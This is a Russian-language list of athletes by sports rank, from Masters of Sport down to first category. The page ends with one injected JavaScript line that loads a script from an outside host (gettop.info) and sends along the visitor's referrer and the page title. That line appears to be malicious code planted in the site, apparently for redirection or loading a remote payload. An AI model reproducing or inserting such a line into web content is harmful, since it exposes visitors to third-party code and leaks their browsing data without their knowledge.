Список разрядников

МС:

  1. Попов Евгений Валентинович
  2. Семенов Илья Владимирович

 

КМС:

  1. Анисимов Владимир Витальевич
  2. Антонов Олег Витальевич
  3. Алексеев Александр Валерьевич
  4. Андрианов-Верхнев Владимир Минеевич
  5. Басов Иван Михайлович
  6. Басов Михаил Юрьевич
  7. Багаев Евгений Сергеевич
  8. Бахарев Денис Сергеевич
  9. Бедняков Алексей Викторович
  10. Васильев Сергей Алексеевич
  11. Волков Сергей Анатольевич
  12. Годунов Андрей Борисович
  13. Григорьев Павел Евгеньевич
  14. Груничев Владимир Юрьевич
  15. Гущин Михаил Петрович
  16. Давыдов Игорь Борисович
  17. Енгалычев Георгий Георгиевич
  18. Ершов Владимир Михайлович
  19. Зубарева Евгения Алексеевна
  20. Зубарева Мария Алексеевна
  21. Киреев Владимир Алексеевич 
  22. Клочков Андрей Александрович
  23. Колдаев Михаил Викторович
  24. Комаров Александр Сергеевич 
  25. Константинов Борис Павлович 
  26. Коротков Александр Николаевич 
  27. Крылов Денис Юрьевич 
  28. Лобанов Владимир Евгеньевич 
  29. Махов Дмитрий Владимирович
  30. Морозов Валерий Петрович 
  31. Муравьев Сергей Юрьевич 
  32. Немцов Владимир Викторович 
  33. Потекаев Дмитрий Сергеевич
  34. Пугин Виктор Алексеевич 
  35. Рахманов Сергей Николаевич 
  36. Репин Сергей Валерьевич
  37. Роганов Аркадий Леонидович 
  38. Скрипкин Сергей Евгеньевич 
  39. Сизов Алексей Витальевич
  40. Сироткин Андрей Сергеевич 
  41. Смирнов Роман Вениаминович
  42. Смирнов Юрий Леонидович
  43. Сорокин Юрий Альбертович
  44. Стародубцева Светлана Николаевна
  45. Сизов Алексей Витальевич
  46. Сухов Максим Николаевич
  47. Фомин Максим Викторович
  48. Якушин Валерий Евгеньевич 

1 разряд:

  1. Агафонов Михаил Евгеньевич
  2. Андумин Алексей Николаевич
  3. Алферьев Андрей Юрьевич 
  4. Блинникова Полина Николаевна
  5. Васильев Алексей Александрович
  6. Васильков Алексей Александрович
  7. Балабаев Игорь Сергеевич 
  8. Годунова Ольга Анатольевна
  9. Дроздова Татьяна Сергеевна
  10. Ильин Александр Вячеславович 
  11. Клыков А. А.  
  12. Круглов Дмитрий Александрович 
  13. Крылова Александра Сергеевна 
  14. Кулагин Евгений Андреевич 
  15. Лебедев Иван Владимирович 
  16. Морозов Константин Александрович 
  17. Мячин Алексей Александрович 
  18. Никитин Юрий Константинович
  19. Никифорова Светлана Юрьевна
  20. Ординаров Иван Владимирович
  21. Ошурков Александр Петрович 
  22. Потемкин Владимир Николаевич 
  23. Репин Олег Владимирович
  24. Семенов Дмитрий Сергеевич
  25. Скрипкина Татьяна Николаевна 
  26. Соколова Ирина Владимировна 
  27. Софронов Александр Николаевич
  28. Сундуков Александр Александрович 
  29. Токарев Дмитрий Сергеевич
  30. Шматов Алексей Николаевич 
  31. Шаров Денис Викторович  

 

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;